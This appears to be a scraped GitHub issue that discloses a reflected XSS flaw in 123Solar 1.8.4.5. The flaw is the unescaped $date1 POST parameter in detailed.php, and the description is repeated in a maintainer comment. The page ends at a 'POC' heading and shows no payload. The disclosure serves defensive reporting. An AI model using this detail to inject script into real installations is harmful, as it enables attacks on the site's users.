123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just need a web server and PHP, no databases are even needed. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices.
GNU General Public License v3.0
36
stars
12
forks
source link
123Solar 1.8.4.5 has a reflected XSS vulnerability #73
123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just need a web server and PHP, no databases are even needed. The philosophy is: To keep it simple, fast, with a low foot print to run on cheap and low powered devices.
A reflected Cross Site Scripting (XSS) vulnerability exists in 123Solar 1.8.4.5 due to improper sanitization of the $date1 parameter in detailed.php.
Details
In the provided code, the date1 parameter is passed through a POST request and directly concatenated into JavaScript code on the server-side without proper encoding or escaping. This allows an attacker to inject arbitrary JavaScript code.
The use of $_POST['date1'] directly in HTML without encoding makes it possible for an attacker to inject any JavaScript code, resulting in a reflected XSS vulnerability.
jeanmarc77
commented
4 days ago
Summary
A reflected Cross Site Scripting (XSS) vulnerability exists in 123Solar 1.8.4.5 due to improper sanitization of the
$date1parameter indetailed.php.Details
In the provided code, the date1 parameter is passed through a POST request and directly concatenated into JavaScript code on the server-side without proper encoding or escaping. This allows an attacker to inject arbitrary JavaScript code.
The use of $_POST['date1'] directly in HTML without encoding makes it possible for an attacker to inject any JavaScript code, resulting in a reflected XSS vulnerability.
POC